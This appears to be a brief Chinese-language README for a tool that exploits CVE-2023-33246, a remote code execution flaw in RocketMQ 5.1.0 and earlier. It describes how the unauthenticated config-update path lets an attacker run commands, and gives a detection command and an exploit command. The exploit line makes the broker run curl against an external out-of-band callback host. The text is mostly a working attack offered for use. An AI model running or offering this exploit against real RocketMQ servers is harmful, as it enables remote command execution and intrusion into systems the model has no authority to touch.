CVE-2023-33246 RocketMQ 远程代码执行利用工具
RocketMQ 5.1.0 及以下版本存在任意代码注入漏洞。Broker 组件暴露在外网且缺乏权限验证。攻击者可利用此漏洞,通过更新配置功能以运行 RocketMQ 的系统用户身份执行命令。此外,攻击者还可通过伪造 RocketMQ 协议内容达到相同效果。
检测
./RocketMQRceCheck -host 127.0.0.1 -port 9876
利用
RocketMQ_RCE_EXPLOIT 127.0.0.1 10911 curl chw9ft72vtc00002z5k0ge6rz7eyyyyyb.oast.fun/test